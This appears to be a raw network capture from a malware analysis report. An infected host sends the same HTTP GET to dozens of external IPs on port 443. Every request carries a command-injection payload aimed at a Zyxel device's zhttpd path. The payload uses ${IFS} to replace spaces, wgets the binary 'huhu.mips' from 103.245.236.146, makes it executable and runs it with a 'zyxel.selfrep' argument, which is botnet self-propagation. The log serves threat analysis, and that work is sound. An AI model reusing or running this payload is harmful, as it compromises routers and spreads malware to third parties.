                                                  Jan 19, 2024 18:23:42.783075094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1315192.168.2.1343428144.242.12.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783133984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1316192.168.2.1355100144.224.87.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783155918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1317192.168.2.135358686.191.175.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783195019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1318192.168.2.1353988157.118.136.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783238888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1319192.168.2.134561868.105.224.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783277988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1320192.168.2.135457837.71.120.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783313990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1321192.168.2.1334286222.101.159.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783351898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1322192.168.2.135488051.61.117.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783404112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1323192.168.2.1349526157.179.167.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783437967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1324192.168.2.134060444.11.138.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783469915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1325192.168.2.1343468222.159.237.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783498049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1326192.168.2.1343282176.162.183.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783559084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1327192.168.2.133555057.69.36.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783580065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1328192.168.2.133427025.106.74.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783632040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1329192.168.2.1344604159.48.134.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783658981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1330192.168.2.1335502105.8.90.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783705950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1331192.168.2.1360720186.233.93.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783740997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1332192.168.2.135513095.8.78.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783802986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1333192.168.2.1356464150.211.94.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783833027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1334192.168.2.134043032.66.22.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783875942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1335192.168.2.133799258.0.144.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783907890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1336192.168.2.1357964121.64.176.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783934116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1337192.168.2.135120843.87.80.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.783986092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1338192.168.2.1335122104.165.41.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784034014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1339192.168.2.1340204222.40.92.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784064054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1340192.168.2.1349140191.66.138.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784096003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1341192.168.2.1340102201.21.97.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784136057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1342192.168.2.134841876.136.227.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784183025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1343192.168.2.134757272.80.255.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784204006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1344192.168.2.1352964160.86.31.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784252882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1345192.168.2.134124467.109.175.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784306049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1346192.168.2.1339670177.23.82.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784339905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1347192.168.2.1340406203.78.90.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784370899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1348192.168.2.1356368179.41.119.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784408092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1349192.168.2.13447949.1.112.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784447908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1350192.168.2.1336660222.255.106.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784490108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1351192.168.2.1359908174.241.136.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784540892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1352192.168.2.134323437.147.83.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784574032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1353192.168.2.134733419.70.1.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784620047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1354192.168.2.133585844.18.73.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784648895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1355192.168.2.1346156213.151.67.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784689903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1356192.168.2.134985069.180.59.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784718037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1357192.168.2.1351720217.97.101.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784749031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1358192.168.2.1340348199.237.237.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784801960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1359192.168.2.133655082.211.124.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784837961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1360192.168.2.135715881.103.113.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784895897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1361192.168.2.133667031.246.203.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784920931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1362192.168.2.1350832114.187.104.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.784976959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1363192.168.2.13441762.45.41.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785023928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1364192.168.2.134350283.43.237.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785065889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1365192.168.2.136072295.70.18.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785093069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1366192.168.2.1342068145.46.107.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785147905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1367192.168.2.135695444.251.137.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785166979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1368192.168.2.1339630150.12.104.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785187960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1369192.168.2.1339468134.223.82.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785259962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1370192.168.2.1341022187.39.219.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785299063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1371192.168.2.1334598189.39.248.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785326004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1372192.168.2.1348554104.98.60.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785382986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1373192.168.2.1334648117.88.118.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785434008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1374192.168.2.1340278194.44.144.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785489082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1375192.168.2.134396453.86.93.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785516024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1376192.168.2.1338082167.119.166.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785543919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1377192.168.2.133438061.190.81.164443
                                                  TimestampBytes transferredDirectionData
